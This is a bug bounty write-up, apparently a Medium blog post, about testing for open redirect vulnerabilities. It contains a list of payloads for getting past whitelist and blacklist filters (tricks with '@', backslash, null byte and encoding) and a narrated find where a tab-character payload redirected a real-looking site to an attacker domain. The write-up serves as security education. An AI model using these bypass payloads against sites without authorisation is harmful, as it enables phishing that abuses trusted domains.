Bug Bounty Experience: Unvalidated Redirection Vulnerability

Unvalidated redirects and forwards are possible when a web application accepts untrusted input that could cause the application to redirect to a URL contained within untrusted input. This makes it possible for an attacker to redirect the browser to a malicious site and use trusted domain name to gain the victim’s credence.

Unvalidated redirects and Unvalidated Forwards are two different vulnerabilities of same class. This vulnerability was one among the OWASP Web Top 10 in 2013 but not found in 2017’s Top 10 list.

While testing unvalidated redirects, I have encountered 2 common scenarios

  1. Straightforward redirections
  2. Tricky redirections

Straightforward redirections

Example:

Request:

https://www.example.com/path123?q=dontforgetethics&url=https://www.attackers.com

Response:

HTTP 1.1 302 Found

Location: https://www.attackers.com

Important pointers while testing:

  • Each and every parameter can be vulnerable. So don’t just blindly look for the parameters which contains “URL” string
  • Parameters such as callback, next, go, redirect, return, back etc can also be vulnerable
  • Don't forget the first point. Each and every parameter can be vulnerable. Parameter “q”(in above URL), a Referrer header, a random key in cookie, anything can be vulnerable to redirection attack.

Tricky redirections

A simple payload, https://www.example.com/path123?q=dontforgetethics&url=https://www.attackers.com might not work sometime.

There could be validations present on whitelisted domains, protocols, paths, patterns etc. In those cases, a little effort will be needed to find the bug. Though there are a lot of ways to bypass such validations, a few would be:

?url=//attackers.com

(incase http:// is blacklisted)

?url=https:attackers.com

(incase // is blacklisted!)

?url=\/\/attackers.com/

(useful for bypassing blacklists // and http://. Browsers see /\/\ as // )

?url=

(old but gold, browsers will redirect to anything after ‘@’)

?url=https://whitelisted.com@whitelisted.com@attackers.com

(when there is a validation on whitelisted domain after the first occurrence of ‘@’ symbol)

?url=https://whitelisted.com@attackers.com/abc@whitelisted.com

(when there is a validation on the domain after last occurrence of ‘@’ symbol)

https://whitelisted.com/menu?url=https://attackers.com\whitelisted.com/../../../

(Beauty of ‘\’)

?url=https://whitelisted.com%00attackers.com (Null Byte, depends on context)

?url=https://whitelisted.com%2540attackers.com

?url=https%3a%2f%2fwww.attackers.com?whitelisted.com

(Encoding/doubleEncoding characters)

This is not an exhaustive set. These are few of the tried and tested payloads I remember. There are many more to these. Keep reading and keep trying.

So one fine day,

I was testing a website in one of the bug bounty platforms. Let's call the domain as

https://maybesecure.com

Though I always try for XSS, IDORs and other business logic bugs, for my bad luck I couldn’t find any. I also tried for redirection vulnerability in multiple URL parameters. In few APIs it was whitelisted properly(I tried my best to bypass) but in few it was a dummy parameter(no significance of URL parameter. That hurts!)

While testing I encountered an API path,

https://maybesecure.com/price?code=100&brand=Premium&datein=2020-06-25&dateout=2020-06-26&nb=1&nbmax=1&lang=English

I tried to understand the significance of each parameter and tampered it accordingly, but nothing seemed spicy! Each wrong tampering redirected me to the error page

http://maybesecure.com/price/error.jsp

Continuing, I changed the parameter “lang” to “xlang”. To my surprise, I got a 302 redirection for a new path which I had not seen before.

https://maybesecure.com/error/frame.jsp?frames=_top&go=https://maybesecure.com/errors/others/index.html

I was happy as this was a new path containing new parameters and also URL seemed to belong to first category of redirection(Straightforward)

For this URL,

https://maybesecure.com/error/frame.jsp?frames=_top&go=https://maybesecure.com/errors/others/index.html

Response was something like this:

<script>top.window.location="https://maybesecure.com/errors/others/index.html”;</script>

I tried different payloads of XSS with respect to the reflection context. As XSS is out of scope for this article, I will write about beautiful problems one could face while identifying XSS in coming articles.

For redirection vulnerability to work, I tried Straightforward payloads such as,

Attempt 1:

Request:

https://maybesecure.com/error/frame.jsp?frames=_top&go=https://attackers.com

Response:

top.window.location="https://maybesecure.com/https://attackers.com”;

Err!! Payload was reflecting as path parameter!

Attempt 2:

Request:

https://maybesecure.com/error/frame.jsp?frames=_top&go=https://maybesecure.com/path123

Response:

top.window.location="https://maybesecure.com/path123”;

Attempt X:

Request:

https://maybesecure.com/error/frame.jsp?frames=_top&go=@attackers.com

Response:

top.window.location="https://maybesecure.com/@attackers.com”;

Multiple attempts were performed such as giving IP addresses, null byte, encoded URLs and all tricky known payloads. But no luck!

Then I started combining different characters %0d, %0a, %00, %08, %03, %0E, etc with different payloads and observed the behaviour. Finally it was %09 which made a difference.

Request:

https://maybesecure.com/error/frame.jsp?frames=_top&go=%2f%09%2f@attackers.com

Response:

top.window.location=”https://maybesecure.com/ /@attackers.com”;

Note that %09 is horizontal tab and hence non-printable (there is a space before ‘/@’). But when it got executed inside the script, it did its magic.

The same vulnerability was present in other subdomains as well and hence, I reported a redirection vulnerability on the “go” parameter for multiple subdomains.

I would say, the turning point is the “lang” parameter. If “lang” parameter is not sent, then the application redirects the user to a whole new path. Luckily, the parameter in that new path was vulnerable to Redirection attack. So remember, Each and every parameter can be vulnerable. So keep fuzzing!

Crash the clap button if you liked this article 😉

Peace ✌️

Cyber Security Enthusiast — Believes in sharing knowledge

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store